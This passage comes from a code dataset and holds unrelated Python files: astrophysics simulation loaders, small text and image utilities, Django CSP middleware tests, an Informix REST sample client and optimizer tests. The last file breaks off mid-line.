var_in_files(info_formatted[\"pattern\"], files):\n fieldLoader = FieldLoader2d(varname, info_formatted, self)\n self.fluids[fluidname].register_variable(\n varname, \"2d\", fieldLoader)\n\n def get_fields_1d(self):\n for fluid_name in self.fluids:\n fl = self.fluids[fluid_name]\n monitor_dir = os.path.join(self.data_dir, \"monitor\", fluid_name)\n monitor_files = os.listdir(monitor_dir)\n for name_pattern, info in vars_1d.items():\n for n in range(len(self.planets)):\n try:\n filename = info[\"pattern\"].format(n)\n except IndexError:\n filename = info[\"pattern\"].format(fluid_name, n)\n\n datafile = os.path.join(monitor_dir, filename)\n if not os.path.exists(datafile):\n datafile = os.path.join(self.data_dir, filename)\n varname = name_pattern.format(n)\n if os.path.exists(datafile):\n info_formatted = copy.deepcopy(info)\n info_formatted[\"pattern\"] = info_formatted[\n \"pattern\"].format(fluid_name, \"{}\")\n info_formatted[\"datafile\"] = datafile\n fieldLoader = FieldLoader1d(varname, info_formatted,\n self)\n fl.register_variable(varname, \"1d\", fieldLoader)\n if not \"for each planet\" in info or not info[\n \"for each planet\"]:\n break\n\n def get_scalars(self):\n for fluid_name in self.fluids:\n fl = self.fluids[fluid_name]\n monitor_dir = os.path.join(self.data_dir, \"monitor\", fluid_name)\n monitor_files = os.listdir(monitor_dir)\n for name_pattern, info in vars_scalar.items():\n for n in range(len(self.planets)):\n datafile = os.path.join(monitor_dir,\n info[\"file\"].format(n))\n varname = name_pattern.format(n)\n if os.path.exists(datafile):\n fl.register_variable(\n varname, \"scalar\",\n ScalarLoader(varname, datafile, info, self))\n if not \"for each planet\" in info or not info[\n \"for each planet\"]:\n break\n\n def get_domain_size(self):\n self.Nphi, self.Nr = loadNcells(self.data_dir)\n\n def load_times(self):\n self.output_times = loadCoarseOutputTimes(self.data_dir,\n self.units[\"time\"])\n self.fine_output_times = loadFineOutputTimes(self.data_dir,\n self.units[\"time\"])\n\n def get_output_time(self, n):\n return self.output_times[n]\n\n def get_fine_output_time(self, n):\n rv = self.fine_output_times[n]\n return rv\n\n def get_units(self):\n self.units = loadUnits(self.data_dir)\n\n\nclass FieldLoader2d(interface.FieldLoader):\n def load_time(self, n, *args, **kwargs):\n if n is None:\n rv = self.loader.output_times\n else:\n if \"stride\" in kwargs.keys():\n n /= kwargs[\"stride\"]\n n = int(n)\n rv = self.loader.get_output_time(n)\n return rv\n\n def load_data(self, n):\n unit = self.info[\"unit\"]\n Nr = self.loader.Nr #+ (1 if \"interfaces\" in self.info and \"r\" in self.info[\"interfaces\"] else 0)\n Nphi = self.loader.Nphi #+ (1 if \"interfaces\" in self.info and \"phi\" in self.info[\"interfaces\"] else 0)\n rv = np.fromfile(self.loader.data_dir +\n \"/\" + self.info[\"pattern\"].format(n)).reshape(\n Nr, Nphi) * unit\n return rv\n\n def load_grid(self, n):\n r_i = np.genfromtxt(self.loader.data_dir + \"/domain_y.dat\"\n )[3:-3] * self.loader.units[\"length\"]\n # account for Fargo3d not writing out last radial interface\n if \"interfaces\" in self.info and \"r\" in self.info[\"interfaces\"]:\n r_i = r_i[:-1]\n phi_i = np.genfromtxt(self.loader.data_dir +\n \"/domain_x.dat\") * u.Unit(\"rad\")\n active_interfaces = self.info[\n \"interfaces\"] if \"interfaces\" in self.info else []\n g = grid.PolarGrid(r_i=r_i,\n phi_i=phi_i,\n active_interfaces=active_interfaces)\n return g\n\n\nclass FieldLoader1d(interface.FieldLoader):\n def load_time(self, n):\n if n is None:\n rv = self.loader.fine_output_times\n else:\n rv = self.loader.get_fine_output_time(n)\n return rv\n\n def load_data(self, n):\n unit = self.info[\"unit\"]\n Nr = self.loader.Nr #+ (1 if \"interfaces\" in self.info and \"r\" in self.info[\"interfaces\"] else 0)\n Nphi = self.loader.Nphi #+ (1 if \"interfaces\" in self.info and \"phi\" in self.info[\"interfaces\"] else 0)\n if self.info[\"directions\"] == [\"r\"]:\n N = Nr\n elif self.info[\"directions\"] == [\"phi\"]:\n N = Nphi\n else:\n raise ValueError(\n \"Trying to construct 1d field but direction is not given. Info = '{}'\"\n .format(self.info))\n datafile = self.info[\"datafile\"]\n rv = np.fromfile(datafile, count=N, offset=n * N * 8) * unit\n return rv\n\n def load_grid(self, n):\n r_i = np.genfromtxt(self.loader.data_dir + \"/domain_y.dat\"\n )[3:-3] * self.loader.units[\"length\"]\n # account for Fargo3d not writing out last radial interface\n if \"interfaces\" in self.info and \"r\" in self.info[\"interfaces\"]:\n r_i = r_i[:-1]\n phi_i = np.genfromtxt(self.loader.data_dir +\n \"/domain_x.dat\") * u.Unit(\"rad\")\n active_interfaces = self.info[\n \"interfaces\"] if \"interfaces\" in self.info else []\n kwargs = {}\n for d in [\"r\", \"phi\"]:\n if d in self.info[\"directions\"]:\n kwargs[d + \"_i\"] = locals()[d + \"_i\"]\n kwargs[\"active_interfaces\"] = active_interfaces\n g = grid.PolarGrid(**kwargs)\n return g\n\n\nclass ScalarLoader:\n def __init__(self, name, datafile, info, loader, *args, **kwargs):\n self.loader = loader\n self.datafile = datafile\n self.info = info\n self.name = name\n self.units = loader.units\n\n def __call__(self):\n time = self.load_time()\n data = self.load_data()\n f = scalar.Scalar(time, data, name=self.name)\n return f\n\n def load_data(self):\n col = self.info[\"datacol\"]\n unit = self.info[\"unit\"]\n rv = np.genfromtxt(self.datafile, usecols=int(col)) * unit\n return rv\n\n def load_time(self):\n col = self.info[\"timecol\"]\n unit = self.units[\"time\"]\n rv = np.genfromtxt(self.datafile, usecols=int(col)) * unit\n return rv\n\n\ndef loadCoarseOutputTimes(dataDir, unit):\n # search all summary.dat files for the time\n outputTimes = []\n pattern = re.compile('OUTPUT [0-9]* at simulation time ([0-9\\.eE+-]*)')\n for f in sorted([f for f in os.listdir(dataDir) if 'summary' in f],\n key=lambda x: int(x[7:-4])):\n with open(os.path.join(dataDir, f), 'r') as infile:\n datastr = infile.read()\n matches = re.findall(pattern, datastr)\n try:\n outputTimes.append(float(matches[0]))\n except ValueError:\n break\n times = np.array(outputTimes)\n # fall back to reading the planet file for multifluid version\n # which is missing the summary files\n #times = np.genfromtxt( os.path.join(dataDir, 'planet0.dat'))[:,8]\n #times = times*unit\n # correct for double entries in the planet file\n return times * unit\n\n\ndef loadFineOutputTimes(dataDir, unit):\n numbers = find_summary_numbers(dataDir)\n times = np.array([])\n for n in numbers:\n params = getParamsFromNthSummary(dataDir, n)\n dt = params[\"dt\"]\n Ninterm = params[\"ninterm\"]\n offset = 0 if len(times) == 0 else times[-1]\n new_times = np.arange(1, Ninterm + 1) * dt + offset\n times = np.append(times, new_times)\n times = times * unit\n return times\n\n\ndef getParamFromSummary(dataDir, param):\n return getParamsFromNthSummary(\n dataDir, find_first_summary_number(dataDir))[param.lower()]\n\n\ndef getParamsFromNthSummary(dataDir, n):\n # parse the Nth summary file to get all\n search_active = False\n parameters = {}\n with open(os.path.join(dataDir, \"summary{}.dat\".format(n))) as f:\n for line in f:\n line = line.strip()\n if not search_active:\n # look for the parameter section identifier\n if line == \"PARAMETERS SECTION:\":\n search_active = True\n continue\n if line == \"\" or line[0] in [\"#\", \"=\"]:\n continue\n if line.startswith(\"*** Input file: \"):\n parameters[\"config path\"] = line.split(\":\")[-1].strip()\n break\n parts = [s.strip() for s in line.split()]\n try:\n val = int(parts[1])\n except ValueError:\n try:\n val = float(parts[1])\n except ValueError:\n val = parts[1]\n parameters[parts[0].lower()] = val\n return parameters\n\n\ndef loadRadius(dataDir, unit, interface=False):\n r = np.genfromtxt(os.path.join(dataDir, 'domain_y.dat')) * unit\n r = r[3:-3] #remove ghost cells\n dr = r[1:] - r[:-1]\n if not interface:\n r = 0.5 * (r[1:] + r[:-1])\n return (r, dr)\n\n\ndef loadPhi(dataDir, interface=False):\n #phiMin, phiMax, Nphi = np.genfromtxt(os.path.join(dataDir, 'dimensions.dat'), usecols=(0,1,6))\n #phi = np.linspace(phiMin, phiMax, Nphi)\n phi = np.genfromtxt(os.path.join(dataDir, 'domain_x.dat'))\n if not interface:\n phi = 0.5 * (phi[1:] + phi[:-1])\n return phi\n\n\ndef loadMeshGrid(dataDir, unit):\n # return a meshgrid for the disk to plot data\n R, Phi = loadMeshGridPolar(dataDir, unit)\n X = R * np.cos(Phi)\n Y = R * np.sin(Phi)\n return (X, Y)\n\n\ndef loadMeshGridPolar(dataDir, unit):\n phi = loadPhi(dataDir)\n r, dr = loadRadius(dataDir, unit)\n Phi, R = np.meshgrid(phi, r)\n return (R, Phi)\n\n\ndef loadUnits(dataDir):\n ### load data units\n first_summary = os.path.join(dataDir, find_first_summary(dataDir))\n if os.path.exists(first_summary):\n ptrn = \"COMPILATION OPTION SECTION:\\n==============================\\n.*\\-DCGS.*\\nGhost\"\n with open(first_summary, 'r') as infile:\n if re.search(ptrn, infile.read()):\n # have cgs units\n units = {\n \"mass\": u.g,\n \"time\": u.s,\n \"length\": u.cm,\n \"temperature\": u.K\n }\n return units\n\n # Try to extract unit normalisation from summary\n units = {}\n units[\"mass\"] = 1.0\n units[\"time\"] = 1.0\n units[\"length\"] = 1.0\n\n with open(first_summary, 'r') as infile:\n ptrn = \"(?<=R0 = \\()\\d+.\\d+\"\n m = re.search(ptrn, infile.read())\n if m:\n units[\"length\"] *= float(m.group()[0])\n\n with open(first_summary, 'r') as infile:\n ptrn = \"(?<=MSTAR = \\()\\d+.\\d+\"\n m = re.search(ptrn, infile.read())\n if m:\n units[\"mass\"] *= float(m.group())\n\n with open(first_summary, 'r') as infile:\n ptrn = r\"STEFANK =.*\\*pow\\(\\(\\d+\\.\\d+\\)\\/\\((\\d+\\.*\\d*\\*\\d+\\.\\d*\\w+\\d*)\\),-0\\.5\"\n m = re.search(ptrn, infile.read())\n if m:\n components = m.group(1).split('*')\n units[\"length\"] *= float(components[0]) * float(\n components[1]) * u.cm\n\n with open(first_summary, 'r') as infile:\n ptrn = r\"STEFANK =.*\\*pow\\(\\(\\d+\\.\\d*\\)\\/(\\d+\\.\\d*\\w+\\d*),-1\\.5\\)\\*\"\n m = re.search(ptrn, infile.read())\n if m:\n components = m.group(1).split('*')\n units[\"mass\"] *= float(m.group(1)) * u.g\n units[\"time\"] = (np.sqrt(units[\"length\"]**3 /\n (const.G.cgs * units[\"mass\"]))).to(u.s)\n\n return units\n # now try units file\n # try:\n # units = {l[0] : float(l[1])*u.Unit(l[2]) for l in\n # [l.split() for l in open(os.path.join(dataDir,'units.dat'),'r')\n # if l.split()[0] != '#' and len(l.split())==3]}\n # ### fix temperature unit\n # units['temperature'] = 1*u.K\n # except FileNotFoundError:\n # Fall back to default units\n # units = { 'mass' : u.solMass, 'time' : 5.2**1.5*u.yr/(2*np.pi), 'length' : 5.2*u.au }\n # Fall back to dimensionless units\n #units = { bu : 1 for bu in ['mass', 'time', 'length'] }\n\n\ndef loadNcells(dataDir):\n # Nphi, Nr = np.genfromtxt(os.path.join(dataDir, 'dimensions.dat'), usecols=(6,7), dtype=int)\n Nphi = int(getParamFromSummary(dataDir, \"Nx\"))\n Nr = int(getParamFromSummary(dataDir, \"Ny\"))\n return (Nphi, Nr)\n\n\ndef load1dRadialMonitorRaw(n, dataFile, Ncells, unit):\n # load data by first seeking the right position\n # and then reading Nrad floats\n f = open(dataFile, \"rb\") # reopen the file\n f.seek(n * Ncells * 8, os.SEEK_SET) # seek\n v = np.fromfile(f, dtype=np.float64, count=Ncells)\n f.close()\n v = v * unit\n return v\n\n\ndef load1dRadialMonitorDensity(n, dataFile, r, dr, unit):\n # Fargo3d outputs monitor variables as the integral over Phi\n # Correct this by computing the density\n rv = load1dRadialMonitorRaw(n, dataFile, len(r), unit)\n rv = rv / np.pi / ((r + dr / 2)**2 - (r - dr / 2)**2)\n return rv\n\n\ndef load1dRadialDensityAveragedFrom2d(n, dataFilePattern, Nr, Nphi, r, dr,\n unit):\n rv = load1dRadialAveragedFrom2d(n, dataFilePattern, Nr, Nphi, unit)\n # make it a 2d density\n rv = rv / np.pi / ((r + dr / 2)**2 - (r - dr / 2)**2)\n return rv\n\n\ndef load1dRadialAveragedFrom2d(n, dataFilePattern, Nr, Nphi, unit):\n # Load 2d data and average over the azimuthal domain\n data = load2d(n, dataFilePattern, Nr, Nphi, unit)\n rv = np.mean(data, axis=1)\n return rv\n\n\ndef load2d(n, dataFilePattern, Nr, Nphi, unit):\n # Load 2d data an reshape it\n rv = np.fromfile(dataFilePattern.format(n)).reshape(Nr, Nphi) * unit\n return rv\n","sub_path":"src/simdata/loaders/fargo3dmultifluid.py","file_name":"fargo3dmultifluid.py","file_ext":"py","file_size_in_byte":27127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"505301133","text":"import re\n\np = re.compile('\\[File[^\\|]+')\np2 = re.compile('\\[ファイル[^\\|]+')\nline = open(\"igirisu.txt\").read()\nm = re.findall(p,line)\nfor i in m:\n i = i.lstrip(\"[File:\")\n print(i)\nm = re.findall(p2,line)\nfor i in m:\n i = i.lstrip(\"[ファイル:\")\n print(i)","sub_path":"ando/chapter03/knock24.py","file_name":"knock24.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"361549475","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 27 09:54:04 2020\r\n\r\n@author: xixiu\r\n\"\"\"\r\n\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\n\r\ndef get_pyrolysis_front(img):\r\n img = cv.imread(img)\r\n \r\n img = img[400:800, :, :]\r\n # img = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\n # (T, img) = cv.threshold(img, 10, 255, cv.THRESH_BINARY)\r\n \r\n a = []\r\n \r\n def on_EVENT_LBUTTONDOWN(event, x, y, flags, param):\r\n if event == cv.EVENT_LBUTTONDOWN:\r\n xy = \"%d,%d\" % (x, y)\r\n a.append(x)\r\n cv.circle(img, (x, y), 1, (0, 0, 255), thickness=-1)\r\n cv.putText(img, xy, (x, y), cv.FONT_HERSHEY_PLAIN,\r\n 1.0, (0, 0, 255), thickness=1)\r\n cv.imshow(\"image\", img)\r\n cv.destroyAllWindows()\r\n \r\n cv.namedWindow(\"image\")\r\n cv.setMouseCallback(\"image\", on_EVENT_LBUTTONDOWN)\r\n cv.imshow(\"image\", img)\r\n cv.waitKey(0)\r\n return a\r\n\r\na = get_pyrolysis_front('0321-S4C3.jpg')","sub_path":"FlameMeasuresforSIBAL/find_informations_of_images.py","file_name":"find_informations_of_images.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"165539771","text":"from __future__ import division;\nimport numpy as np;\nimport os;\n\n#-------#\n# Input #\n#-------#\nrunName = \"../cristobaliteTest\";\nfirst = 0;\nlast = 800;\n\n#-----------#\n# Functions #\n#-----------#\n\n#reading file into 2D list of strings\ndef readDatafile(filename, separator):\n\tinfile = open(filename, \"r\");\n\tout = [];\n\tfor line in infile:\n\t\tout.append(line.split(separator));\n\t#end\n\tinfile.close();\n\treturn out;\n#end\n\n#------#\n# Main #\n#------#\n#Read rcut, size and processors from data file\ndatafilename = runName + \"/init/data.dat\";\ndata = readDatafile(datafilename, \" \");\npx = int(data[0][0]);\npy = int(data[0][1]);\npz = int(data[0][2]);\nsx = float(data[1][0]);\nsy = float(data[1][1]);\nsz = float(data[1][2]);\nrcut = float(data[2][0]);\n#Calculate Lx, Ly, Lz for each processor\nprocs = px*py*pz;\ns = np.array([sx, sy, sz]);\np = np.array([px, py, pz]);\n#Number of cells\nc = np.floor(s/rcut);\n#Size of cells\nb = s/c;\n#Number of cells in each processor\nn = c//p;\n#Number of processors with one extra cell\nm = c%p;\n#Size of processors\nL = n*b;\n#Processor extra cell boundary\nB = m*(L + b);\n\n#Coordinates of processors\nR = np.zeros([procs, 3]);\nfor rank in range(0, procs):\n\t#Finding x, y, z latice positions of processes\n\ti = rank%px;\n\tj = (rank//px)%py;\n\tk = rank//(px*py);\n\tlr = np.array([i, j, k]);\n\tfor d in range(0, 3):\n\t\tif(lr[d] > m[d]):\n\t\t\tR[rank, d] = B[d] + (lr[d] - m[d])*L[d];\n\t\telse:\n\t\t\tR[rank, d] = lr[d]*(L[d] + b[d]);\n\t\t#end\n\t#end\n#end\n\nfor i in range(first, last + 1):\n\tdirname = runName + (\"/%05d\"%i);\n\t#Make sure directory exists\n\tif(not os.path.exists(dirname)):\n\t\tcontinue;\n\t#end\n\t#Finding number of particles\n\tN = 0;\n\tfor rank in range(0, procs):\n\t\tfilename = dirname + (\"/%03d.xyz\"%rank);\n\t\tpfile = open(filename, \"r\");\n\t\tN += int(float(pfile.readline()));\n\t\tpfile.close();\n\t#end\n\tcombinedFilename = dirname + \"/combined.xyz\";\n\tcombinedFile = open(combinedFilename, \"w\");\n\tcombinedFile.write(str(N) + \"\\n\\n\");\n\tfor rank in range(0, procs):\n\t\tfilename = dirname + (\"/%03d.xyz\"%rank);\n\t\tpfile = open(filename, \"r\");\n\t\t#Toss away comment and number of particles\n\t\tpfile.readline(); pfile.readline();\n\t\tfor line in pfile:\n\t\t\tlinesplit = line.split(\" \");\n\t\t\tt = linesplit[0];\n\t\t\tr = linesplit[1:4];\n\t\t\trest = linesplit[4:];\n\t\t\t#Convert from local to global coordinates\n\t\t\tfor d in range(0, 3):\n\t\t\t\tr[d] = str(float(r[d]) + R[rank, d]);\n\t\t\t#end\n\t\t\tcombinedFile.write(\" \".join([t, \" \".join(r), \" \".join(rest)]));\n\t\t#end\n\t\tpfile.close();\n\t#end\n\tcombinedFile.close();\n#end\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"clayff/pythonScripts/combineProcs.py","file_name":"combineProcs.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"255903892","text":"import logging\nimport datetime\nimport sys\n#import tensorflow as tf\n\ndef setup_logger(name):\n now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')\n formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n handler = logging.FileHandler('log/{}.log'.format(now), mode='w')\n handler.setFormatter(formatter)\n\n screen_handler = logging.StreamHandler(stream=sys.stdout)\n screen_handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n logger.addHandler(screen_handler)\n\n return logger\n\n# class Logger(object):\n# \"\"\"Tensorboard logger.\"\"\"\n\n# def __init__(self, log_dir):\n# \"\"\"Initialize summary writer.\"\"\"\n# self.writer = tf.summary.FileWriter(log_dir)\n\n# def scalar_summary(self, tag, value, step):\n# \"\"\"Add scalar summary.\"\"\"\n# summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])\n# self.writer.add_summary(summary, step)\n\n# def close(self):\n# self.writer.export_scalars_to_json(\"./all_scalars.json\")\n# self.writer.close()","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"531735852","text":"from django.http import HttpResponse, HttpResponseServerError\nfrom django.test import RequestFactory\nfrom django.test.utils import override_settings\n\nfrom csp.middleware import CSPMiddleware\n\n\nHEADER = 'Content-Security-Policy'\nmw = CSPMiddleware()\nrf = RequestFactory()\n\n\ndef test_add_header():\n request = rf.get('/')\n response = HttpResponse()\n mw.process_response(request, response)\n assert HEADER in response\n\n\ndef test_exempt():\n request = rf.get('/')\n response = HttpResponse()\n response._csp_exempt = True\n mw.process_response(request, response)\n assert HEADER not in response\n\n\n@override_settings(CSP_EXCLUDE_URL_PREFIXES=('/inlines-r-us'))\ndef text_exclude():\n request = rf.get('/inlines-r-us/foo')\n response = HttpResponse()\n mw.process_response(request, response)\n assert HEADER not in response\n\n\n@override_settings(CSP_REPORT_ONLY=True)\ndef test_report_only():\n request = rf.get('/')\n response = HttpResponse()\n mw.process_response(request, response)\n assert HEADER not in response\n assert HEADER + '-Report-Only' in response\n\n\ndef test_dont_replace():\n request = rf.get('/')\n response = HttpResponse()\n response[HEADER] = 'default-src example.com'\n mw.process_response(request, response)\n assert response[HEADER] == 'default-src example.com'\n\n\ndef test_use_config():\n request = rf.get('/')\n response = HttpResponse()\n response._csp_config = {'default-src': ['example.com']}\n mw.process_response(request, response)\n assert response[HEADER] == 'default-src example.com'\n\n\ndef test_use_update():\n request = rf.get('/')\n response = HttpResponse()\n response._csp_update = {'default-src': ['example.com']}\n mw.process_response(request, response)\n assert response[HEADER] == \"default-src 'self' example.com\"\n\n\n@override_settings(CSP_IMG_SRC=['foo.com'])\ndef test_use_replace():\n request = rf.get('/')\n response = HttpResponse()\n response._csp_replace = {'img-src': ['bar.com']}\n mw.process_response(request, response)\n assert response[HEADER] == \"default-src 'self'; img-src bar.com\"\n\n\n@override_settings(DEBUG=True)\ndef test_debug_exempt():\n request = rf.get('/')\n response = HttpResponseServerError()\n mw.process_response(request, response)\n assert HEADER not in response\n","sub_path":"csp/tests/test_middleware.py","file_name":"test_middleware.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"377806913","text":"import json\nimport requests\n\n##\n# Python sample application: connecting to Informix using REST\n##\n\n# Topics\n# 1 Inserts\n# 1.1 Insert a single document to a collection\n# 1.2 Insert multiple documents to a collection\n# 2 Queries\n# 2.1 Find all documents in a collection\n# 2.2 Find documents in a collection that match a query condition\n# 2.3 Add a projection clause to a query\n# 2.4 Find documents in a collection and retrieve using a cursor\n# 3 Update documents in a collection\n# 4 Delete documents in a collection\n# 5 Get a listing of collections\n# 6 Drop a collection\n# 7 Run a command\n\n### Connection information ###\nbaseUrl=\"http://localhost:8080\"\ndbname=\"test\"\nbaseDbUrl=baseUrl + \"/\" + dbname\nauthInfo=('user','pass')\ncookieName=\"informixRestListener.sessionId\"\n\ndef printError(message, reply):\n print(\"Error: \" + message)\n print(\"status code: \" + str(reply.status_code))\n print(\"content: \" + str(reply.content))\n\nprint(\"# 1 Inserts\")\nprint(\"# 1.1 Insert a single document to a collection\")\ndata = json.dumps({'firstName':'Luke', 'lastName':'Skywalker', 'age': 34})\nreply = requests.post(baseDbUrl+\"/people\", data, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"inserted \" + str(doc.get('n')) + \" documents\")\nelse:\n printError(\"Unable to insert document\", reply)\n\nprint(\"# 1.2 Insert multiple documents to a collection\")\ndata = json.dumps([{'firstName':'Leia', 'lastName':'Skywalker', 'age': 34}, {'firstName':'Anakin', 'lastName':'Skywalker', 'age': 55} ] )\nreply = requests.post(baseDbUrl+\"/people\", data, auth=authInfo)\nif reply.status_code == 202:\n doc = reply.json()\n print(\"inserted \" + str(doc.get('n')) + \" documents\")\nelse:\n printError(\"Unable to insert multiple documents\", reply)\n\nprint(\"# 2 Queries\")\nprint(\"# 2.1 Find all documents in a collection\")\nreply = requests.get(baseDbUrl+\"/people\", None, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"query result: \" + str(doc))\nelse:\n printError(\"Unable to query documents in collection\", reply)\n\nprint(\"# 2.2 Find documents in a collection that match a query condition\")\nquery = json.dumps({'firstName':'Luke'})\nreply = requests.get(baseDbUrl+\"/people?query=\" + query, None, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"query result: \" + str(doc))\nelse:\n printError(\"Unable to query documents in collection\", reply)\n\nprint(\"# 2.3 Add a projection clause to a query\")\nprojection = json.dumps({'firstName':1, 'age': 1, '_id':0})\nreply = requests.get(baseDbUrl+\"/people?fields=\" + projection, None, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"query result: \" + str(doc))\nelse:\n printError(\"Unable to query documents in collection\", reply)\n\nprint(\"# 2.4 Find documents in a collection and retrieve using a cursor\")\nprojection = json.dumps({'colname':1, 'tabid': 1, 'coltype':1})\nreply = requests.get(baseDbUrl+\"/syscolumns?fields=\" + projection, None, auth=authInfo)\nif reply.status_code == 200:\n fetchNum = 1\n cursor_id = reply.headers['cursorid']\n cookies = dict()\n cookies[cookieName]=reply.cookies[cookieName]\n headers = {'cursorid':cursor_id}\n print (\"reply headers: \" + str(reply.headers))\n print (\"cursor id: \" + cursor_id)\n print (\"cookies = \" + str(cookies))\n print (\"fetch \" + str(fetchNum) + \": \" + str(reply.json()))\n moreRows = (cursor_id != 0)\n while (moreRows):\n reply = requests.get(baseDbUrl+\"/syscolumns?fields=\" + projection, None, headers=headers,cookies=cookies)\n fetchNum += 1\n print (\"fetch \" + str(fetchNum) + \": \" + str(reply.json()))\n if reply.status_code == 200:\n moreRows = reply.headers.get('cursorid') != None\n else : \n moreRows = False\n printError(\"Unable to get more documents from a cursor\", reply) \nelse:\n printError(\"Unable to query documents in collection using a cursor\", reply)\n\nprint(\"# 3 Update documents in a collection\")\nquery = json.dumps({'firstName': 'Luke'})\ndata = json.dumps({'$set' : {'age' : 35} })\nreply = requests.put(baseDbUrl+\"/people?query=\" + query, data, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"updated \" + str(doc.get('n')) + \" documents\")\nelse:\n printError(\"Unable to update documents in collection\", reply)\n\nprint(\"# 4 Delete documents in a collection\")\nquery = json.dumps({'age': { '$gt': 50} })\nreply = requests.delete(baseDbUrl+\"/people?query=\" + query, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"deleted \" + str(doc.get('n')) + \" documents\")\nelse:\n printError(\"Unable to delete documents in collection\", reply)\n\nprint(\"# 5 Get a listing of collections\")\nreply = requests.get(baseDbUrl)\nif reply.status_code == 200:\n doc = reply.json()\n dbList = \"\"\n for db in doc:\n dbList += \"\\'\" + db + \"\\' \"\n print(\"Collections: \" + str(dbList))\nelse:\n printError(\"Unable to retrieve collection listing\", reply)\n \nprint(\"# 6 Drop a collection\")\nreply = requests.delete(baseDbUrl+\"/people\", auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"delete collection result: \" + str(doc))\nelse:\n printError(\"Unable to drop collection\", reply)\n\nprint(\"# 7 Run a command\")\ncommand = json.dumps({'dbStats':1})\nreply = requests.get(baseDbUrl+\"/$cmd?query=\" + command, None, auth=authInfo)\nif reply.status_code == 200:\n doc = reply.json()\n print(\"command result: \" + str(doc))\nelse:\n printError(\"Unable to run command\", reply)\n","sub_path":"python/rest/HelloGalaxy/HelloWorld.py","file_name":"HelloWorld.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"485407334","text":"import re\n\n\ndef main(file_text):\n cases = file_text.splitlines()\n cases = cases[1:] # drop the first line with row count\n i = 0\n text = ''\n for sentence in cases:\n i += 1\n words = sentence.split()\n words.reverse()\n text += 'Case #' + str(i) + ': ' + ' '.join(words) + '\\n'\n\n return text\n\nif __name__ == '__main__':\n inputs = ['this is a test', 'foobar', 'all your base']\n # main(inputs)\n open('B-small-practice.out', 'w').write(\n main(open('B-small-practice.in', 'r').read())\n )\n\n open('B-large-practice.out', 'w').write(\n main(open('B-large-practice.in', 'r').read())\n )","sub_path":"ReverseWords/ReverseWords.py","file_name":"ReverseWords.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"113598663","text":"from datetime import datetime\nfrom sectionize import pdf_to_text, parse\nimport glob\nimport logging\n\ndef just_pdf2text():\n \"\"\"\n Hmm. With 115 dockets, this finished in 3 seconds, for .026 seconds per docket.\n this suggests that the problem is not the pdf2text, but in text2stitched. :(\n \"\"\"\n print(\"Testing time of pdf to text.\")\n directory = \"./testDocs/test_two/pdfs/*.pdf\"\n iter = glob.iglob(directory)\n start = datetime.now()\n counter = 0\n for file in iter:\n pdf_to_text(file)\n counter += 1\n end = datetime.now()\n print(\"Finished.\")\n duration = (end-start).seconds\n print(\"Processed {} dockets in {} seconds.\".format(counter, duration))\n print(\"{} seconds per docket.\".format(duration/counter))\n print(\"Thanks for playing our game.\")\n\ndef just_parse():\n \"\"\"\"\n This is the slow one. For 115 dockets, it took 80 seconds, or .76 seconds\n per docket. This is the stumbling block in the whole thing. Why is this\n method so slow?!\n \"\"\"\n logging.basicConfig(filename=\"parse_timing.md\", level=logging.DEBUG)\n logging.info(\"pdf2text_time, create_grammar_time, parse_grammar_time, node_visitor_time\")\n print(\"Testing time of parse(), which includes pdf2text.\")\n directory = \"./testDocs/test_two/pdfs/*.pdf\"\n iter = glob.iglob(directory)\n start = datetime.now()\n counter = 0\n for file in iter:\n parse(file)\n counter += 1\n end = datetime.now()\n print(\"Finished.\")\n duration = (end-start).seconds\n print(\"Processed {} dockets in {} seconds.\".format(counter, duration))\n print(\"{} seconds per docket.\".format(duration/counter))\n print(\"Thanks for playing our game.\")\n\njust_parse()\n\n\n","sub_path":"scripts/study_pdf2text_timing.py","file_name":"study_pdf2text_timing.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"69431867","text":"import numpy as np\n\nfrom opytimizer.core import function\nfrom opytimizer.optimizers import ba\nfrom opytimizer.spaces import search\nfrom opytimizer.utils import constants\n\n\ndef test_ba_hyperparams():\n hyperparams = {\n 'f_min': 0,\n 'f_max': 2,\n 'A': 0.5,\n 'r': 0.5\n }\n\n new_ba = ba.BA(hyperparams=hyperparams)\n\n assert new_ba.f_min == 0\n\n assert new_ba.f_max == 2\n\n assert new_ba.A == 